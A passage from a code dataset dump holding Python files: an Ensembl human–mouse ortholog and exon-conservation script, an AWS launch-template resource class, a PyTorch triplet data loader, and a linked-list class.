protein_coding pairs.\n\t\"\"\"\n\tgeneOnlyOrthoDic1,transcriptOnlyOrthoDic1,exonOnlyOrthoDic1={},{},{}\n\tgeneOnlyOrthoDic2,transcriptOnlyOrthoDic2,exonOnlyOrthoDic2={},{},{}\n\n\tfor g1 in genePairsDic:\n\t\ttype=genePairsDic[g1][0][1]\n\t\tif type==\"ortholog_one2one\":\n\t\t\tg2=genePairsDic[g1][0][0]\n\t\telse:\n\t\t\tcontinue\n\n\t\tif geneDic1[g1].basicInfoDic[\"gene_biotype\"]!=\"protein_coding\" or geneDic2[g2].basicInfoDic[\"gene_biotype\"]!=\"protein_coding\":\n\t\t\tcontinue\n\n\t\t# small dictionaries that have only the relevant stuff for one gene pair\n\t\tnewGeneDic1={}; newGeneDic2={}\n\t\tnewExonDic1={}; newExonDic2={}\n\t\tnewTranscriptDic1={}; newTranscriptDic2={}\n\t\t#\n\t\tnewGeneDic1[g1]=geneDic1[g1]\n\t\tnewGeneDic2[g2]=geneDic2[g2]\n\t\tgeneOnlyOrthoDic1[g1]=geneDic1[g1]\n\t\tgeneOnlyOrthoDic2[g2]=geneDic2[g2]\n\t\tfor tId in geneDic1[g1].transcripts:\n\t\t\tnewTranscriptDic1[tId]=transcriptDic1[tId]\n\t\t\ttranscriptOnlyOrthoDic1[tId]=transcriptDic1[tId]\n\t\tfor tId in geneDic2[g2].transcripts:\n\t\t\tnewTranscriptDic2[tId]=transcriptDic2[tId]\n\t\t\ttranscriptOnlyOrthoDic2[tId]=transcriptDic2[tId]\n\t\t#\n\t\tfor eId in geneDic1[g1].exons:\n\t\t\tnewExonDic1[eId]=exonDic1[eId]\n\t\t\texonOnlyOrthoDic1[eId]=exonDic1[eId]\n\t\tfor eId in geneDic2[g2].exons:\n\t\t\tnewExonDic2[eId]=exonDic2[eId]\n\t\t\texonOnlyOrthoDic2[eId]=exonDic2[eId]\n\t\t#\n\t\tos.system(\"mkdir -p \"+ outdir+\"/\"+g1+\"-\"+g2)\n\t\t#print geneDic1[g1].get_summary_string()+\"\\t\"+geneDic2[g2].get_summary_string()\n\t\toutfilename=outdir+\"/\"+g1+\"-\"+g2+\"/org1.pickledDictionaries\"\n\t\tpickle.dump((newGeneDic1,newTranscriptDic1,newExonDic1), open(outfilename,\"wb\"))\n\t\toutfilename=outdir+\"/\"+g1+\"-\"+g2+\"/org2.pickledDictionaries\"\n\t\tpickle.dump((newGeneDic2,newTranscriptDic2,newExonDic2), open(outfilename,\"wb\"))\n\t\t# to load use:\n\t\t#geneDic1,transcriptDic1,exonDic1=pickle.load(open(\"pickled.stuff\",\"rb\"))\n\t#\n\t\n\treturn (geneOnlyOrthoDic1,transcriptOnlyOrthoDic1,exonOnlyOrthoDic1, geneOnlyOrthoDic2,transcriptOnlyOrthoDic2,exonOnlyOrthoDic2)\n\ndef print_one2one_genePairs(genePairsDic, geneDic1,geneDic2,outfilename):\n\t\"\"\"\n\tPrint one liner for each pair of genes that match each other one to one.\n\tThere are around 16.5k such genes for human-mouse and 15.8k are protein_coding pairs.\n\t\"\"\"\n\toutfile=open(outfilename,'w')\n\toutfile.write(\"chrName1\\tstart_coord1\\tend_coord1\\tstrand1\\tgeneID1\\tgeneName1\\tgeneType1\\tnoOfTranscripts1\\tnoOfExons1\\ttype1\\t\")\n\toutfile.write(\"chrName2\\tstart_coord2\\tend_coord2\\tstrand2\\tgeneID2\\tgeneName2\\tgeneType2\\tnoOfTranscripts2\\tnoOfExons2\\ttype2\\n\")\n\t#print \"chrName1\\tstart_coord1\\tend_coord1\\tstrand1\\tgeneID1\\tgeneName1\\tgeneType1\\tnoOfTranscripts1\\tnoOfExons1\\ttype1\\t\",\n\t#print \"chrName2\\tstart_coord2\\tend_coord2\\tstrand2\\tgeneID2\\tgeneName2\\tgeneType2\\tnoOfTranscripts2\\tnoOfExons2\\ttype2\"\n\tfor g1 in genePairsDic:\n\t\ttype=genePairsDic[g1][0][1]\n\t\tif type==\"ortholog_one2one\":\n\t\t\tg2=genePairsDic[g1][0][0]\n\t\telse:\n\t\t\tcontinue\n\t\toutfile.write(geneDic1[g1].get_summary_string()+\"\\t\"+geneDic2[g2].get_summary_string()+\"\\n\")\n\t\t#print geneDic1[g1].get_summary_string()+\"\\t\"+geneDic2[g2].get_summary_string()\n\t#\n\toutfile.close()\n\treturn\n\ndef print_one2one_transcriptListPairs(genePairsDic, geneDic1,geneDic2,transcriptDic1,transcriptDic2,orgId1,orgId2,outdir):\n\t\"\"\"\n\tPrint the lists of transcripts for each one to one mapped gene pair. 
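One summary file per organism is written under outdir/<geneID1>-<geneID2>/, e.g. human_transcripts.bed and mouse_transcripts.bed for the organism IDs used in main().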
\n\tThere are around 16.5k such genes for human-mouse and 15.8k are protein_coding pairs.\n\t\"\"\"\n\tfor g1 in genePairsDic:\n\t\ttype=genePairsDic[g1][0][1]\n\t\tif type==\"ortholog_one2one\":\n\t\t\tg2=genePairsDic[g1][0][0]\n\t\telse:\n\t\t\tcontinue\n\t\t#\n\t\toutdirTemp=outdir+\"/\"+g1+\"-\"+g2; os.system(\"mkdir -p \"+outdirTemp)\n\t\toutfile1=open(outdirTemp+\"/\"+orgId1+\"_transcripts.bed\",'w')\n\t\toutfile2=open(outdirTemp+\"/\"+orgId2+\"_transcripts.bed\",'w')\n\t\t\n\t\ttranscripts1=geneDic1[g1].transcripts\n\t\ttranscripts2=geneDic2[g2].transcripts\n\t\tfor t1 in transcripts1:\n\t\t\toutfile1.write(transcriptDic1[t1].get_summary_string()+\"\\n\")\n\t\tfor t2 in transcripts2:\n\t\t\toutfile2.write(transcriptDic2[t2].get_summary_string()+\"\\n\")\n\t\t#\n\t\toutfile1.close()\n\t\toutfile2.close()\n\t#\n\treturn\n\ndef print_one2one_exonListPairs(genePairsDic, geneDic1,geneDic2,exonDic1,exonDic2,orgId1,orgId2,outdir):\n\t\"\"\"\n\tPrint the lists of exons for each one to one mapped gene pair. \n\tThere are around 16.5k such genes for human-mouse and 15.8k are protein_coding pairs.\n\t\"\"\"\n\tfor g1 in genePairsDic:\n\t\ttype=genePairsDic[g1][0][1]\n\t\tif type==\"ortholog_one2one\":\n\t\t\tg2=genePairsDic[g1][0][0]\n\t\telse:\n\t\t\tcontinue\n\t\t#\n\t\toutdirTemp=outdir+\"/\"+g1+\"-\"+g2; os.system(\"mkdir -p \"+outdirTemp)\n\t\toutfile1=open(outdirTemp+\"/\"+orgId1+\"_exons.bed\",'w')\n\t\toutfile2=open(outdirTemp+\"/\"+orgId2+\"_exons.bed\",'w')\n\t\t\n\t\texons1=geneDic1[g1].exons\n\t\texons2=geneDic2[g2].exons\n\t\tfor e1 in exons1:\n\t\t\toutfile1.write(exonDic1[e1].get_summary_string()+\"\\n\")\n\t\tfor e2 in exons2:\n\t\t\toutfile2.write(exonDic2[e2].get_summary_string()+\"\\n\")\n\t\t#\n\t#\tprint exonDic[e].get_summary_string()\n\n\t\toutfile1.close()\n\t\toutfile2.close()\n\t\t\n\t#\n\treturn\n\ndef extract_fasta_files_for_exons(refGD,exonDic,typ,fivePrimeFlank,threePrimeFlank,outfilename):\n\t\"\"\"\n\tWith the help of genomedata archive extract the nucleotide sequences \n\tfrom and around each exon and write them in a .fa file.\n\trefGD is the genomedata archive created for the reference genome.\n\ttyp can be one of the following:\n\t\t\"allExon\": Extract the sequence of the whole exon.\n\t\t\"allExonPlusMinus\": Like allExon but with flanking 5' and 3'.\n\t\t\"intronExon\": Extract the sequence from the juction of this\n\t\t exon and the previous intron.\n\t\t\"exonIntron\": Extract the sequence from the juction of this\n\t\t exon and the next intron.\n\tfivePrimeFlank is the amount to extract extra from the 5' end.\n\tthreePrimeFlank is the amount to extract extra from the 3' end.\n\n\t\"\"\"\n\tif typ==\"allExon\":\n\t\tfivePrimeFlank=0; threePrimeFlank=0\n\t#\n\toutfile=open(outfilename,'w')\n\twith Genome(refGD) as genome:\n\t\tfor id in exonDic:\n\t\t\te=exonDic[id]\n\t\t\tch,st,en=\"chr\"+e.basicInfoDic[\"chromosome\"], e.basicInfoDic[\"start_coord\"], e.basicInfoDic[\"end_coord\"]\n\t\t\tstrand,id=e.basicInfoDic[\"strand\"], e.basicInfoDic[\"exon_id\"]\n\t\t\t# off by one error fix by -1\n\t\t\tst=int(st)-1\n\t\t\ten=int(en)-1\n\t\t\tif strand==\"+\":\n\t\t\t\tif typ==\"intronExon\":\n\t\t\t\t\ten=st # make sure we're around the first bp of exon\n\t\t\t\t\tst=st-fivePrimeFlank # make sure 5' part is of size fivePrimeFlank including st\n\t\t\t\t\ten=en+threePrimeFlank # make sure 3' part is of size threePrimeFlank including en\n\t\t\t\telif typ==\"exonIntron\":\n\t\t\t\t\tst=en # make sure we're around the last bp of 
exon\n\t\t\t\t\tst=st-fivePrimeFlank+1\n\t\t\t\t\ten=en+threePrimeFlank+1\n\t\t\t\telif typ==\"allExonPlusMinus\" or typ==\"allExon\":\n\t\t\t\t\tst=st-fivePrimeFlank\n\t\t\t\t\ten=en+threePrimeFlank+1\n\t\t\t\t#\n\t\t\t\tid=id+\"_plusStrand\"\n\t\t\t\tsq=genome[ch].seq[st:en].tostring().lower().upper()\n\t\t\telse:\n\t\t\t\tif typ==\"intronExon\":\n\t\t\t\t\tst=en # make sure we're around the first bp of exon\n\t\t\t\t\ten=en+fivePrimeFlank+1\n\t\t\t\t\tst=st-threePrimeFlank+1\n\t\t\t\telif typ==\"exonIntron\":\n\t\t\t\t\ten=st # make sure we're around the last bp of exon\n\t\t\t\t\ten=en+fivePrimeFlank\n\t\t\t\t\tst=st-threePrimeFlank\n\t\t\t\telif typ==\"allExonPlusMinus\" or typ==\"allExon\":\n\t\t\t\t\tst=st-threePrimeFlank\n\t\t\t\t\ten=en+fivePrimeFlank+1\n\t\t\t\t#\n\t\t\t\tid=id+\"_minusStrand\"\n\t\t\t\tsq=genome[ch].seq[st:en].tostring()\n\t\t\t\t#sq=sq.lower()[::-1].upper() # reverse\n\t\t\t\t#sq=sq.lower().translate(complement).upper() # complement\n\t\t\t\tsq=sq.lower().translate(complement)[::-1].upper() # reverse complement\n\t\t\t#\n\t\t\toutfile.write(\">\"+id+\"_\"+typ+\"\\n\")\n\t\t\toutfile.write(sq+\"\\n\")\n\t\t#\n\t#\n\toutfile.close()\n\treturn\n\ndef extract_conservation_stats_for_exons(refGD,exonDic,typ,fivePrimeFlank,threePrimeFlank,outfilename):\n\t\"\"\"\n\tWith the help of genomedata archive extract the nucleotide sequences \n\tfrom and around each exon and convservation scores and write them to a file.\n\trefGD is the genomedata archive created for the reference genome.\n\ttyp can be one of the following:\n\t\t\"allExon\": Extract the sequence of the whole exon.\n\t\t\"allExonPlusMinus\": Like allExon but with flanking 5' and 3'.\n\t\t\"intronExon\": Extract the sequence from the juction of this\n\t\t exon and the previous intron.\n\t\t\"exonIntron\": Extract the sequence from the juction of this\n\t\t exon and the next intron.\n\tfivePrimeFlank is the amount to extract extra from the 5' end.\n\tthreePrimeFlank is the amount to extract extra from the 3' end.\n\tIF outfilename is \"None\" then no output file is written, only \n\trelevant fields are added to the exon in exonDic.\n\t\"\"\"\n\tsys.stderr.write(\"Extracting conservation stats and acceptor donor sites for exons from genomedata archive\\n\")\n\t# this is the trackname for phastCons scores loaded from wig files\n\ttrackName=\"phastCons\"\n\t#\n\n\tif typ==\"allExon\":\n\t\tfivePrimeFlank=0; threePrimeFlank=0\n\t#\n\tif outfilename!=\"None\":\n\t\toutfile=open(outfilename,'w')\n\t\t# header line\n\t\toutfile.write(\"CHR\\tstart\\tend\\tstrand\\tExonID\\tacceptor2bp\\tdonor2bp\\tpreAcceptorCons\\taccepterCons1\\taccepterCons2\\texon5primeCons\\texonMidCons\\texon3primeCons\\tdonorCons1\\tdonorCons2\\tpostDonorCons\\n\")\n\t#\n\twith Genome(refGD) as genome:\n\t\tlineCount=0\n\t\tfor id in exonDic:\n\t\t\tprint (id)\n\t\t\te=exonDic[id]\n\t\t\tch,st,en=\"chr\"+e.basicInfoDic[\"chromosome\"], e.basicInfoDic[\"start_coord\"], e.basicInfoDic[\"end_coord\"]\n\t\t\tif e.exon_type==\"partCoding\":\n\t\t\t\tcodingSt=min(int(e.codingExon[0])-1,int(e.codingExon[1])-1)\n\t\t\t\tcodingEn=max(int(e.codingExon[0])-1,int(e.codingExon[1])-1)\n\t\t\t#\n\t\t\tstOrig=st; enOrig=en;\n\t\t\tstrand,id=e.basicInfoDic[\"strand\"], e.basicInfoDic[\"exon_id\"]\n\t\t\t# off by one error fix by -1\n\t\t\tst=int(st)-1\n\t\t\ten=int(en)-1\n\t\t\tif strand==\"+\":\n\t\t\t\tif typ==\"intronExon\":\n\t\t\t\t\ten=st # make sure we're around the first bp of exon\n\t\t\t\t\tst=st-fivePrimeFlank # make sure 5' part is of size 
fivePrimeFlank including st\n\t\t\t\t\ten=en+threePrimeFlank # make sure 3' part is of size threePrimeFlank including en\n\t\t\t\telif typ==\"exonIntron\":\n\t\t\t\t\tst=en # make sure we're around the last bp of exon\n\t\t\t\t\tst=st-fivePrimeFlank+1\n\t\t\t\t\ten=en+threePrimeFlank+1\n\t\t\t\telif typ==\"allExonPlusMinus\":\n\t\t\t\t\tst=st-fivePrimeFlank\n\t\t\t\t\ten=en+threePrimeFlank+1\n\t\t\t\t#\n\t\t\t\t#id=id+\"_plusStrand\"\n\t\t\t\tsq=genome[ch].seq[st:en].tostring().lower().upper()\n\t\t\t\tallScores=(genome[ch])[st:en,trackName]\n\t\t\telse:\n\t\t\t\tif typ==\"intronExon\":\n\t\t\t\t\tst=en # make sure we're around the first bp of exon\n\t\t\t\t\ten=en+fivePrimeFlank+1\n\t\t\t\t\tst=st-threePrimeFlank+1\n\t\t\t\telif typ==\"exonIntron\":\n\t\t\t\t\ten=st # make sure we're around the last bp of exon\n\t\t\t\t\ten=en+fivePrimeFlank\n\t\t\t\t\tst=st-threePrimeFlank\n\t\t\t\telif typ==\"allExonPlusMinus\":\n\t\t\t\t\tst=st-threePrimeFlank\n\t\t\t\t\ten=en+fivePrimeFlank+1\n\t\t\t\t#\n\t\t\t\t#id=id+\"_minusStrand\"\n\t\t\t\tsq=genome[ch].seq[st:en].tostring()\n\t\t\t\tsq=sq.lower().translate(complement)[::-1].upper() # reverse complement\n\t\t\t\tallScores=(genome[ch])[st:en,trackName][::-1]\n\t\t\t#\n\t\t\tprint (sq)\n\t\t\tprint (allScores)\n\t\t\tprint (genome[ch].seq[st:en].tostring())\n\t\t\tif e.exon_type==\"partCoding\":\n\t\t\t\tcodingScores=(genome[ch])[codingSt:codingEn,trackName][::-1]\n\t\t\t### Extract all the scores to be written to the output file ###\n\t\t\tacceptor2bp=sq[fivePrimeFlank-2:fivePrimeFlank]\n\t\t\tdonor2bp=(sq[-threePrimeFlank:])[0:2]\n\t\t\t#\n\t\t\tx=allScores[:fivePrimeFlank-2]\n\t\t\tpreAcceptorCons=np.nanmean(x)\n\t\t\t#\n\t\t\taccepterCons1=allScores[fivePrimeFlank-2]\n\t\t\taccepterCons2=allScores[fivePrimeFlank-1]\n\t\t\t#\n\t\t\tx=allScores[fivePrimeFlank:fivePrimeFlank+(fivePrimeFlank-2)]\n\t\t\texon5primeCons=np.nanmean(x)\n\t\t\t#\n\t\t\tx=allScores[fivePrimeFlank+(fivePrimeFlank-2):-(threePrimeFlank+(threePrimeFlank-2))]\n\t\t\texonMidCons=np.nanmean(x)\n\t\t\t#\n\t\t\tx=allScores[-(threePrimeFlank+(threePrimeFlank+2)):-threePrimeFlank]\n\t\t\texon3primeCons=np.nanmean(x)\n\t\t\t#\n\t\t\tdonorCons1=allScores[-threePrimeFlank]\n\t\t\tdonorCons2=allScores[-threePrimeFlank+1]\n\t\t\t#\n\t\t\tx=allScores[-threePrimeFlank+2:]\n\t\t\tpostDonorCons=np.nanmean(x)\n\t\t\t#\n\t\t\t#first20bp=allScores[:20]\n\t\t\t#outfile.write(\"%s\\t%d\\t%d\\t%s\\t%s\\t%s\\t%s\\t\" % (ch,stOrig,enOrig,strand,id,acceptor2bp,donor2bp))\n\t\t\t#outfile.write(\"\\t\".join([repr(x) for x in first20bp])+\"\\n\")\n\t\t\texonDic[id].acceptor2bp=acceptor2bp\n\t\t\texonDic[id].donor2bp=donor2bp\n\t\t\texonDic[id].phastConsScores=allScores\n\t\t\texonDic[id].avgConsScore=np.nanmean(allScores[fivePrimeFlank:-threePrimeFlank])\n\t\t\tif e.exon_type==\"partCoding\":\n\t\t\t\texonDic[id].avgCodingConsScore=np.nanmean(codingScores)\n\n\t\t\tif lineCount%100000==0:\n\t\t\t\tsys.stderr.write(str(lineCount)+\"\\t\")\n\t\t\tlineCount+=1\n\t\t\tprint (sq)\n\t\t\tprint (\"%s\\t%d\\t%d\\t%s\\t%s\\t%s\\t%s\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\n\" % \\\n (ch,stOrig,enOrig,strand,id,acceptor2bp,donor2bp, preAcceptorCons, accepterCons1, accepterCons2, exon5primeCons,\\\n exonMidCons, exon3primeCons, donorCons1, donorCons2, postDonorCons, exonDic[id].avgCodingConsScore, exonDic[id].avgConsScore))\n\n\t\t\tif 
outfilename!=\"None\":\n\t\t\t\toutfile.write(\"%s\\t%d\\t%d\\t%s\\t%s\\t%s\\t%s\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\t%.2f\\n\" % \\\n\t\t\t\t\t(ch,stOrig,enOrig,strand,id,acceptor2bp,donor2bp, preAcceptorCons, accepterCons1, accepterCons2, exon5primeCons,\\\n\t\t\t\t\t exonMidCons, exon3primeCons, donorCons1, donorCons2, postDonorCons, exonDic[id].avgCodingConsScore, exonDic[id].avgConsScore))\n\t\t\t#\n\t\t\t###\n\t\t#\n\t#\n\tsys.stderr.write(\"\\n\\n\")\n\tif outfilename!=\"None\":\n\t\toutfile.close()\n\treturn exonDic\n\ndef assign_firstMidLast_exon_counts(exonDic,transcriptDic):\n\tfor e in exonDic:\n\t\tfor i in range(len(exonDic[e].exonNumbers)):\n\t\t\ttranscriptLength=len(transcriptDic[exonDic[e].transcriptIds[i]].exons)\n\t\t\ttempExNo=exonDic[e].exonNumbers[i]\n\t\t\t#print [transcriptLength, tempExNo]\n\t\t\t#single exon\n\t\t\tif tempExNo==1 and tempExNo==transcriptLength:\n\t\t\t\texonDic[e].firstMidLast[0]+=1\n\t\t\t\texonDic[e].firstMidLast[2]+=1\n\t\t\t#first exon\n\t\t\telif tempExNo==1:\n\t\t\t\texonDic[e].firstMidLast[0]+=1\n\t\t\t#last exon\n\t\t\telif tempExNo==transcriptLength:\n\t\t\t\texonDic[e].firstMidLast[2]+=1\n\t\t\telse:\n\t\t\t\texonDic[e].firstMidLast[1]+=1\n\t\t#\n\t\t#if exonDic[e].firstMidLast[0]>0 or exonDic[e].firstMidLast[2]>0:\n\t\t#print exonDic[e].get_summary_string()\n\t#\n\treturn exonDic\n\n# Testing functionalities\ndef main(argv):\n\torgId1=\"human\"; orgId2=\"mouse\";\n\trefGD1=\"/home/fao150/proj/2015orthoR01/results/2015-03-17_creating-genomedata-archives-for-refs/hg38\"\n\trefGD2=\"/home/fao150/proj/2015orthoR01/results/2015-03-17_creating-genomedata-archives-for-refs/mm10\"\n\n#\toutdir=\"GTFsummaries\"; \n\tif len(argv)==1:\n\t\treturn\n\n\toutdir=argv[1]\n\tos.system(\"mkdir -p \"+outdir)\n\tos.system(\"mkdir -p \"+outdir+\"/GTFsummaries\")\t\t\n\t#infilename=\"/projects/b1017/shared/Ensembl-files/Homo_sapiens.GRCh38.78.gtf.gz\"\n\tinfilename=\"Homo_sapiens.GRCh38.102.gtf\"\n\t#geneDic1,transcriptDic1,exonDic1,infoDic1=parse_organism_GTF(orgId1, infilename, outdir+\"/GTFsummaries\")\n\t\n\t#infilename=\"/projects/b1017/shared/Ensembl-files/Mus_musculus.GRCm38.78.gtf.gz\"\n\tinfilename=\"Mus_musculus.GRCm38.102.gtf\"\n\t#geneDic2,transcriptDic2,exonDic2,infoDic2=parse_organism_GTF(orgId2, infilename, outdir+\"/GTFsummaries\")\n\n\t## these two files were downloaded by hand selecting columns from Ensembl's Biomart\n\t## I weren't able to redo the same column selections recently so I decided to switch to\n\t## parsing the orthology information from readily available Ensembl files like below ones:\n\t## ftp://ftp.ensembl.org/pub/release-80/mysql/ensembl_mart_80/\n\t## hsapiens_gene_ensembl__homolog_mmus__dm.txt.gz\n\n\t#infilename=\"/projects/b1017/shared/Ensembl-files/Ensembl-human-GRCh38-to-mouse-GRCm38.p3.txt.gz\"\n\t#genePairsHumanToMouse=parse_ensembl_gene_pairings(orgId1,orgId2,infilename)\n\t#infilename=\"/projects/b1017/shared/Ensembl-files/Ensembl-mouse-GRCm38.p3-to-human-GRCh38.txt.gz\"\n\t#genePairsHumanToMouse=parse_ensembl_gene_pairings(orgId1,orgId2,infilename)\n\t\n\t#### Rewritten:\tAbhijit ####\n\tinfilename=\"Ensembl-human-GRCh38-to-mouse-GRCm38.Formatted.txt\"\n\t#genePairsHumanToMouse=parse_ensembl_gene_pairings(infilename)\n\n\tinfilename=\"Ensembl-mouse-GRCm38-to-human-GRCh38.Formatted.txt\" \n\t#genePairsMouseToHuman=parse_ensembl_gene_pairings(infilename)\n\t#consistency_check(genePairsHumanToMouse,genePairsMouseToHuman)\n\n\t## if consistency check is ok then just use one side. 
This is OK for one2one mappings.\n\t#genePairsDic=genePairsHumanToMouse\n\t#os.system(\"mkdir -p \"+outdir+\"/perGenePairPickledInfo\")\n\t#pickle_one2one_genePairs_allInfo(genePairsDic,geneDic1,geneDic2,exonDic1,exonDic2,transcriptDic1,transcriptDic2,outdir+\"/perGenePairPickledInfo\") \n\t\n\t#infilename=\"/projects/b1017/shared/Ensembl-files/hsapiens_gene_ensembl__homolog_mmus__dm.txt.gz\"\n\t#infilename=\"hsapiens_gene_ensembl__homolog_mmusculus__dm.txt\"\n\t#proteinToGeneDic,genePairsDic,proteinPairsDic=parse_ensembl_geneAndProtein_pairings(infilename,{},{})\n\t#print ([\"1\",len(proteinToGeneDic),len(genePairsDic),len(proteinPairsDic)])\n\n\t#infilename=\"/projects/b1017/shared/Ensembl-files/mmusculus_gene_ensembl__homolog_hsap__dm.txt.gz\"\n\t#infilename=\"mmusculus_gene_ensembl__homolog_hsapiens__dm.txt\"\n\t#proteinToGeneDic,genePairsDic,proteinPairsDic=parse_ensembl_geneAndProtein_pairings(infilename,proteinToGeneDic,proteinPairsDic)\n\t#print ([\"2\",len(proteinToGeneDic),len(genePairsDic),len(proteinPairsDic)])\n\n\t\n\t#exonDic1=assign_firstMidLast_exon_counts(exonDic1,transcriptDic1)\n\t#exonDic2=assign_firstMidLast_exon_counts(exonDic2,transcriptDic2)\n\n\ttyp=\"allExonPlusMinus\"\n\toutfilename=\"None\"\n\tfivePrimeFlank=12; threePrimeFlank=12\n\t#exonDic1=extract_conservation_stats_for_exons(refGD1,exonDic1,typ,fivePrimeFlank,threePrimeFlank,outfilename)\n\t#exonDic2=extract_conservation_stats_for_exons(refGD2,exonDic2,typ,fivePrimeFlank,threePrimeFlank,outfilename)\n\n\t#outdir=argv[1]+\"/after\"\n\t#os.system(\"mkdir -p \"+outdir)\n\t#print_some_summary(orgId1, geneDic1,transcriptDic1,exonDic1,{}, outdir)\n\t#print_some_summary(orgId2, geneDic2,transcriptDic2,exonDic2,{}, outdir)\n\n#\toutdir=\"perGenePairExonLists\"\n\tif len(argv)==2:\n\t\treturn\n\n\t#outdir=argv[2]\n\t#os.system(\"mkdir -p \"+outdir)\n\n\t#pickle_one2one_genePairs_allInfo(genePairsDic,geneDic1,geneDic2,exonDic1,exonDic2,transcriptDic1,transcriptDic2,outdir) \n\n#\toutfilename=outdir+\"/genePairsSummary-one2one.txt\"\n#\tprint_one2one_genePairs(genePairsDic,geneDic1,geneDic2,outfilename) # either way is ok since one2one\n\t#\n#\tprint_one2one_exonListPairs(genePairsDic,geneDic1,geneDic2,exonDic1,exonDic2,orgId1,orgId2,outdir)\n#\tprint_one2one_transcriptListPairs(genePairsDic,geneDic1,geneDic2,transcriptDic1,transcriptDic2,orgId1,orgId2,outdir)\n\n\treturn\n\nif __name__ == \"__main__\":\n\tmain(sys.argv)\n\n\n","sub_path":"Human-Monkey-Processed-Data/scripts/ensemblUtils.py","file_name":"ensemblUtils.py","file_ext":"py","file_size_in_byte":49280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"452692608","text":"from typing import List, Optional\n\nfrom cloudrail.knowledge.context.aws.resources.networking_config.network_configuration import NetworkConfiguration\nfrom cloudrail.knowledge.context.aws.resources.ec2.security_group import SecurityGroup\nfrom cloudrail.knowledge.context.aws.resources.service_name import AwsServiceName\nfrom cloudrail.knowledge.context.aws.resources.aws_resource import AwsResource\n\n\nclass LaunchTemplate(AwsResource):\n \"\"\"\n Attributes:\n template_id: The ID of the template.\n name: The name of the template.\n http_token: \"optional\" or \"required\" (if None, means \"optional\").\n image_id: The EC2 Image ID of the instance.\n security_group_ids: The security groups used with the instance.\n version_number: The version number of this template.\n iam_instance_profile: The IAM Instance Profile to associate with 
launched instances (may be None).\n network_configurations: The network configuration(s) set in the template (may be None).\n security_groups: Points to the actual security groups set in security_group_ids.\n instance_type: The Instance type (i.e. 'm5.8xlarge').\n ebs_optimized: Indication whether the EC2 instance has EBS optimization enabled of not.\n monitoring_enabled: Indication if the launched EC2 instance will have detailed monitoring enabled.\n \"\"\"\n def __init__(self,\n template_id: str,\n name: str,\n http_token: str,\n image_id: str,\n security_group_ids: List[str],\n version_number: int,\n region: str,\n account: str,\n iam_instance_profile: Optional[str],\n ebs_optimized: bool,\n monitoring_enabled: bool,\n instance_type: str,\n network_configurations: List[NetworkConfiguration] = None):\n super().__init__(account, region, AwsServiceName.AWS_LAUNCH_TEMPLATE)\n self.template_id: str = template_id\n self.name: str = name\n self.http_token: str = http_token\n self.image_id: str = image_id\n self.security_group_ids: List[str] = security_group_ids\n self.version_number: int = version_number\n self.iam_instance_profile: Optional[str] = iam_instance_profile\n self.network_configurations: List[NetworkConfiguration] = network_configurations or []\n self.security_groups: List[SecurityGroup] = []\n self.ebs_optimized: bool = ebs_optimized\n self.monitoring_enabled: bool = monitoring_enabled\n self.instance_type: str = instance_type\n\n def get_keys(self) -> List[str]:\n return [self.template_id, self.version_number]\n\n def get_name(self) -> str:\n return self.name\n\n def get_id(self) -> str:\n return self.template_id\n\n def get_type(self, is_plural: bool = False) -> str:\n if not is_plural:\n return 'Launch template'\n else:\n return 'Launch templates'\n\n def get_cloud_resource_url(self) -> str:\n return '{0}ec2/v2/home?region={1}#LaunchTemplateDetails:launchTemplateId={2}'\\\n .format(self.AWS_CONSOLE_URL, self.region, self.template_id)\n\n def get_arn(self) -> str:\n pass\n\n @property\n def is_tagable(self) -> bool:\n return False\n","sub_path":"cloudrail/knowledge/context/aws/resources/autoscaling/launch_template.py","file_name":"launch_template.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"536641852","text":"import os\nimport torch\nfrom torch.utils.data.dataset import Dataset\nfrom pprint import pprint\n\nclass DataFromFile(Dataset):\n def __init__(self, data_path, transforms=None):\n self.data_path = data_path\n\n assert data_path is not None and os.path.exists(data_path), 'No file to read data from'\n\n if data_path:\n # will be read in from txt file\n with open(data_path, 'r') as datafile:\n self.data = datafile.readlines() \n\n self.transforms = transforms\n\n def __getitem__(self, index):\n item = self.data[index]\n # pprint('item:{}'.format(str(item)))\n # item would be a comma-delimited string of length\n # split, map to ints\n item = item.strip().split('_') # now it is a list of ints\n # pprint('item:{}'.format(str(item)))\n # print(len(item))\n\n # no modifiers\n query = item[:4]\n # pprint(query)\n query = [list(map(int, q.lstrip('[').rstrip(']').split(','))) for q in query]\n # print(len(query), len(query[0]))\n\n pos = item[4:8]\n pos = [list(map(int, p.lstrip('[').rstrip(']').split(','))) for p in pos]\n # print(len(pos), len(pos[0]))\n neg = item[8:]\n neg = [list(map(int, n.lstrip('[').rstrip(']').split(','))) for n in neg]\n # print(len(neg), len(neg[0]))\n 
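# at this point each raw line is assumed to pack 12 '_'-separated bracketed\n        # int lists: 4 query vectors, 4 positive vectors, 4 negative vectors\n        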
# pprint(neg)\n\n if self.transforms:\n query, pos, neg = self.transforms(query), self.transforms(pos), self.transforms(neg)\n\n return query, pos, neg\n\n def __len__(self):\n return len(self.data)\n\n","sub_path":"scripts/dataload.py","file_name":"dataload.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"5884888","text":"# We can't delete the first node or make it point to another node\n# because in Python, this will cause the list to point to an entirely different\n# object( reassigning vs manipulating)\nclass Node:\n def __init__(self, v=None):\n self.value = v\n self.next = None\n\n def isempty(self):\n return (self.value == None)\n\n def append_recursively(self, v):\n # If the node is empty simply put a value in it\n if self.isempty(): \n self.value = v\n # If we are at the last node make its next pointer to the current value\n elif self.next == None: \n newnode = Node(v)\n self.next = newnode\n # If there are nodes in front, recursively append the required value\n # into the next node\n else:\n (self.next).append_recursively(v)\n return\n\n def append(self, v):\n if self.isempty():\n self.value = v\n return\n\n temp = self\n while (temp.next != None):\n temp = temp.next\n newnode = Node(v)\n temp.next = newnode\n return\n\n # Insert at the beginning\n def insert(self, v):\n if self.isempty():\n self.value = v\n return\n\n newnode = Node(v)\n\n # Evchange values in self and newnode\n (self.value, newnode.value) = (newnode.value, self.value)\n (self.next, newnode.next) = (newnode, self.next)\n\n def 